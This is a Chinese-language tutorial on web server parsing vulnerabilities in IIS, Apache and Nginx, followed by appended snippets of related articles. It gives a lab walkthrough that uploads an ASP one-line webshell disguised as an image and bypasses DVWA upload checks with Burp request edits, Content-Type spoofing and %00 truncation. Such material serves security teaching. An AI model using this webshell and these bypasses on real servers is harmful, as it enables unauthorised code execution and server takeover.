解析漏洞整理

1.什么是解析漏洞

以其他格式执行出脚本格式的效果。

2.解析漏洞产生的条件

1.命名规则

2.搭建平台

3.常见的解析漏洞

(一)IIS5.x-6.x解析漏洞

使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。

1)目录解析(6.0)

形式:www.xxx.com/xx.asp/xx.jpg

原理: 服务器默认会把.asp,.asp目录下的文件都解析成asp文件。

2)文件解析

形式:www.xxx.com/xx.asp;.jpg

原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。

3)解析文件类型

IIS6.0 默认的可执行文件除了asp还包含这三种 :

/test.asa
/test.cer
/test.cdx

(二)IIS7.5解析漏洞

IIS7.5的漏洞与nginx的类似,都是由于PHP配置文件中,开启了cgi.fix_pathinfo,而这并不是nginx或者iis7.5本身的漏洞。

(三)apache解析漏洞

漏洞原理

Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如test.php.qwe.asd “.qwe”和”.asd” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.qwe.asd解析成php。

漏洞形式

www.xxxx.xxx.com/test.php.php123

其余配置问题导致漏洞

(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。

(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以php 方式执行。

修复方案

1.apache配置文件,禁止.php.这样的文件执行,配置文件里面加入

2.用伪静态能解决这个问题,重写类似.php.*这类文件,打开apache的httpd.conf找到LoadModule rewrite_module modules/mod_rewrite.so

把#号去掉,重启apache,在网站根目录下建立.htaccess文件

(四)Nginx解析漏洞

漏洞原理

Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问www.xx.com/phpinfo.jpg/1.php这个URL时,$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI,但是PHP为什么会接受这样的参数,并将phpinfo.jpg作为PHP文件解析呢?这就要说到fix_pathinfo这个选项了。 如果开启了这个选项,那么就会触发在PHP中的如下逻辑:

PHP会认为SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就会将phpinfo.jpg作为PHP文件来解析了

漏洞形式

www.xxxx.com/UploadFiles/image/1.jpg/1.php

www.xxxx.com/UploadFiles/image/1.jpg%00.php

www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php

另外一种手法:上传一个名字为test.jpg,然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。

总结:

IIS6.0(x和脚本格式可以自定义)

文件命名形式:

正常命名:www.xxx.com/logo.jpg

触发解析漏洞命名:www.xxx.com/logo.asp;.jpg 或 logo.asp;.x.jpg

文件夹命名形式:

正常命名:www.xxx.com/images/qq.jpg

触发解析漏洞命名:www.xxx.com/image.asp/qq.jpg

IIS7.X(x自定义,只能执行php)

正常命名:www.xxx.com/logo.jpg

触发解析漏洞命名:www.xxx.com/logo.jpg/x.php

Apache(xxxx代表任意后缀,向上识别解析)

正常命名:www.xxx.com/a.php

触发解析漏洞命名:www.xxx.com/a.php.xxxx

Nginx同iis7.x一致

4.一个简单的解析例子

测试环境为:windwos2003+iis6.0 注意:测试环境必须是在windwos2003+iis6.0的情况下才能成功解析,不能是小旋风之类的软件来测试。

1)文件解析

直接访问图片地址: http://192.168.87.129:8067/6.jpg

改变图片后戳名为:6.asp;.jpg 再次访问,就会发现,jpg格式的图片被解析成了asp格式的脚本语言。

还可以改成:6.asp;1234.jpg 效果是一样的。

2)目录解析

将文件改为一个正常的图片格式文件,然后把它复制到一个test.asp的目录下,然后方法,发现也能正常解析。

5.解析漏洞利用场景

解析漏洞主要用在文件上传,上传一些图片什么的,然后通过解析漏洞,解析为动态语言。而上传很重要的一点就是命名规则,因为如果你不知道,服务器的文件命名规则的话,解析漏洞就不好利用,因为我们要获取我们上传文件名,只有获取到了上传的文件名,才能进行下一步操作,而命名规则无非就是以下两种。

测试源码:http://download.csdn.net/detail/u011781521/9766646 下载好之后,在服务器中新建一个网站,并复制进去。

然后访问首页:http://192.168.87.129:8898/Index.asp

后台登录地址: http://192.168.87.129:8898/Tcnet/Admin_Login.asp

文件上传地址: http://192.168.87.129:8898/Upload.asp?formname=myform&editname=bookpic&uppath=upfile&&filelx=jpg 用户名与密码: admin admin 注意:必须先要登录才能使用文件上传功能。

 

1.本地,服务端命名一致

1)filepath上传利用

直接上传解析漏洞命名的后门文件

访问这个地址:http://192.168.87.129:8898/Upload.asp?formname=myform&editname=bookpic&uppath=upfile&&filelx=jpg

先直接上传一个asp的文件试试看能否上传

发现并不能上传。那我们就利用解析漏洞来试下看,把asp改为fk.asp;.jpg(注:这里是图片一句话)

OK能上传。复制上传好的地址,然后访问

图片能查看,但是asp并没有被解析。。。这是时候怎么办,从新上传xxx.asp;.jpg,然后用Burp来抓包,进行修改。

右键发送到Repeater中去

修改其中的"filepath"在upfile/后面加上aaa.asp;. 然后Go一下你就会发现,这里就成了一个解析漏洞了

然后访问下这个地址,asp成功的被解析了。

然后用菜刀进行连接。

密码就是"include";对应的asp一句话<%execute request("include")%>  然后点击添加。。

连接成功。

2.本地,服务端命名不一致,基于时间,日期等命名

1)filetype突破

这里采用DVWA来测试,

然后点击"View Source"查看源码。

Low代码:

[html] view plain copy

  1. <?php
  2. if( isset( $_POST[ ‘Upload‘ ] ) ) {  //判断是否是post传过来的,也就是判断upload是否为空
  3. $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";   //取得网站绝对路径,然后用绝对路径+相对路径得到一个完整的路径。
  4. $target_path .= basename( $_FILES[ ‘uploaded‘ ][ ‘name‘ ] );   //根据上面得到的完整路径+得到的文件名。
  5. if( !move_uploaded_file( $_FILES[ ‘uploaded‘ ][ ‘tmp_name‘ ], $target_path ) ) {  //判断你上传的图片是否成功移动到完整路径中
  6. // No
  7. echo ‘<pre>Your image was not uploaded.</pre>‘;
  8. }
  9. else {
  10. // Yes!
  11. echo "<pre>{$target_path} succesfully uploaded!</pre>";
  12. }
  13. }
  14. ?>

$_FILES[‘uploaded‘][‘name‘] :取得$_FILES全局文件变量的上传文件名

该源码存在的问题:

第一个没有验证后缀格式

什么格式得可以上传。。

第二个客户端,服务端文件命名一致

Medium代码:

[html] view plain copy

  1. <?php
  2. if( isset( $_POST[ ‘Upload‘ ] ) ) {
  3. // 我们要往哪里写?
  4. $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
  5. $target_path .= basename( $_FILES[ ‘uploaded‘ ][ ‘name‘ ] );
  6. // 文件信息
  7. $uploaded_name = $_FILES[ ‘uploaded‘ ][ ‘name‘ ];
  8. $uploaded_type = $_FILES[ ‘uploaded‘ ][ ‘type‘ ];
  9. $uploaded_size = $_FILES[ ‘uploaded‘ ][ ‘size‘ ];
  10. // 判断这是一个图片吗?
  11. if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
  12. ( $uploaded_size < 100000 ) ) {
  13. // 我们可以移动文件到上传文件夹吗?
  14. if( !move_uploaded_file( $_FILES[ ‘uploaded‘ ][ ‘tmp_name‘ ], $target_path ) ) {
  15. // No
  16. echo ‘<pre>Your image was not uploaded.</pre>‘;
  17. }
  18. else {
  19. // Yes!
  20. echo "<pre>{$target_path} succesfully uploaded!</pre>";
  21. }
  22. }
  23. else {
  24. // Invalid file
  25. echo ‘<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>‘;
  26. }
  27. }
  28. ?>

$_FILES[‘uploaded‘][‘name‘];     取得$_FILES全局文件变量的上传文件名

$_FILES[‘uploaded‘][‘type‘];     取得$_FILES全局文件变量的上传文件类型

$_FILES[‘uploaded‘][‘size‘];    取得$_FILES全局文件变量的上传大小

验证文件上传类型及大小,还是本地,服务端命名一致

然后我们来上传个asp文件用Burp抓包,看是否能成功上传。

拦截到之后发送到Repeater,然后go一下

上传失败。。。这就很好奇了,明明这里没有验证文件后戳名,为什么还是上传不了???? 但是,他这里验证了文件类型!!我们看下上传的文件是什么类型的

看它上传的类型为:application/octet-stram 所以他把上传的asp当做application来处理里。

然后我们改一下content-type的类型为:image/jpeg

再次GO一下,发现上传成功了。

2)%00截断:截断字符

注意:数据包修改%00,务必进行url编码

把6.asp;.jpg改为6.asp%00.jpg

然后选中右键把%00进行url编码下。

这样的话,就把.jpg给截断了,然后就变成了6.asp。

High代码:

[html] view plain copy

  1. <?php
  2. if( isset( $_POST[ ‘Upload‘ ] ) ) {
  3. // 我们要往哪里写?
  4. $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
  5. $target_path .= basename( $_FILES[ ‘uploaded‘ ][ ‘name‘ ] );
  6. // 文件信息
  7. $uploaded_name = $_FILES[ ‘uploaded‘ ][ ‘name‘ ];
  8. $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, ‘.‘ ) + 1);
  9. $uploaded_size = $_FILES[ ‘uploaded‘ ][ ‘size‘ ];
  10. $uploaded_tmp  = $_FILES[ ‘uploaded‘ ][ ‘tmp_name‘ ];
  11. // 判断是否是图片?
  12. if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
  13. ( $uploaded_size < 100000 ) &&
  14. getimagesize( $uploaded_tmp ) ) {
  15. // 我们可以移动文件到上传文件夹吗?
  16. if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
  17. // No
  18. echo ‘<pre>Your image was not uploaded.</pre>‘;
  19. }
  20. else {
  21. // Yes!
  22. echo "<pre>{$target_path} succesfully uploaded!</pre>";
  23. }
  24. }
  25. else {
  26. // Invalid file
  27. echo ‘<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>‘;
  28. }
  29. }
  30. ?>

strrpos( $uploaded_name, ‘.‘ ) + 1 的作用就是去文件的最后一个点

例如:

www.jpg.zip.txt.asp

他就会截取最后一个点,所以是绕不过的。

然后下面又是一个判断。格式必须是图片型的才能执行下面的代码。

时间: 2024-08-26 19:19:35

解析漏洞整理的相关文章

Apache解析漏洞(一)

500是服务器内部错误,说明是有文件的 Apache 漏洞之后缀名解析漏洞 我们都知道windows2003 + IIS6.0下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件不管扩展名为什么,都会当作asp来解析.我们一般称这个漏洞为 windows2003+iis6.0目录解析漏洞. 但是大家可能不知道的是,apache服务器也存在类似的解析漏洞我们来做下实验,我在本地搭建好了一个apache+php的测试平台 两个文件phpinfo.php phpinfo.php.a

Apache解析漏洞详解

很多次听到人说apache的“解析漏洞”了,正好今天又有人问,那就简单科普一下这个“解析漏洞”是何物. 先来看测试过程和结果的对比吧. 结果一 首先,我安装了apache 2.x版本,同时以module方式使apache与php结合,测试发现确实存在这样的解析漏洞. 结果二 然后,我将apache与php的结合方式修改为fastcgi方式,测试发现爆500错误,不存在这样的解析漏洞. 错误提示: 1Bad file descriptor: mod_fcgid: don't know how to

IIS 6.0/7.0/7.5、Nginx、Apache 等服务器解析漏洞总结

IIS 6.0 目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码 IIS6.0 会将 xx.jpg 解析为 asp 文件. 后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名) IIS6.0 都会把此类后缀文件成功解析为 asp 文件. (站长评论:IIS6.0解析漏洞的成因,可以查阅罗哥写的一篇短文:IIS文件名解析漏洞扼要分析) {/xx.asp:.jpg 此类文件在Windows下不允许存

再提供一种解决Nginx文件类型错误解析漏洞的方法

[文章作者:张宴 本文版本:v1.2 最后修改:2010.05.24 转载请注明原文链接:http://blog.zyan.cc/nginx_0day/] 注:2010年5月23日14:00前阅读本文的朋友,请按目前v1.1版本的最新配置进行设置. 昨日,80Sec 爆出Nginx具有严重的0day漏洞,详见<Nginx文件类型错误解析漏洞>.只要用户拥有上传图片权限的Nginx+PHP服务器,就有被入侵的可能. 其实此漏洞并不是Nginx的漏洞,而是PHP PATH_INFO的漏洞,详见:h

文件解析漏洞

1:IIS6.0解析漏洞 目录解析漏洞,在以.asp结尾的目录下的文件都会被当作asp文件来执行,比如上传了1.jpg的文件到upload.asp目录下,那么1.jpg文件就会被当作asp文件来执行. 文件名解析漏洞,IIS6.0从左向右解析文件名,遇到分号就会自动终止解析,所以上传形如1.asp;.jpg的文件就被当作1.asp文件来执行. 2:IIS7.0,7.5和Nginx<8.03畸形解析漏洞(写webshell漏洞) 原理:在上传文件所在目录下创建一个一句话木马文件 实现过程:新建一个

文件上传漏洞及解析漏洞总结

文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力.这种攻击方式是最为直接和有效的,"文件上传"本身没有问题,有问题的是文件上传后,服务器怎么处理.解释文件.如果服务器的处理逻辑做的不够安全,则会导致严重的后果. 文件上传后导致的常见安全问题一般有: 1)上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行. 2)上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(

【转】服务器解析漏洞

原文链接: 服务器解析漏洞 服务器解析漏洞算是历史比较悠久了,但如今依然广泛存在.在此记录汇总一些常见服务器的解析漏洞,比如IIS6.0.IIS7.5.apache.nginx等方便以后回顾温习. (一)IIS 5.x-6.x解析漏洞 使用IIS 5.x-6.x版本的服务器,大多为Windows Server 2003,网站比较古老,网页开发语言一般为asp:该解析漏洞也只能解析asp文件,而不能解析aspx文件. 目录解析(6.0) 形式:www.xxx.com/xx.asp/xx.jpg 原

【渗透课程】第六篇-上传漏洞之解析漏洞

上传漏洞,我们为什么要上传?因为我们说过.在网站服务器上 肯定有一个Web容器,它里面装的就是Web应用程序 .某些脚本具有一定的执行和修改权限.这些权限可以说是服务器给客户端访问时提供的服务的同时提供的, 提供服务越多, 存在漏洞的几率就越大. 如果我们上传了某个具有对系统进行操作性权限的文件(一句话木马,大马,bat,dll等),那对于我们接下去的攻击提供了很大的方便. 上面这些我就不多说了 ,之前也讲过了.回归正题, 我们这篇要说的是: 解析漏洞 在这里我先说一个知识点吧,相信很多人都听说

各种解析漏洞获取Webshell

各种解析漏洞拿shell  一.IIS 6.0解析漏洞 IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg第一种,在网站下建立文件夹的名字为 .asp..asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行.例如创建目录 wooyun.asp,那么/wooyun.asp/1.jpg将被当作asp文件来执行.假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了.第二种,在II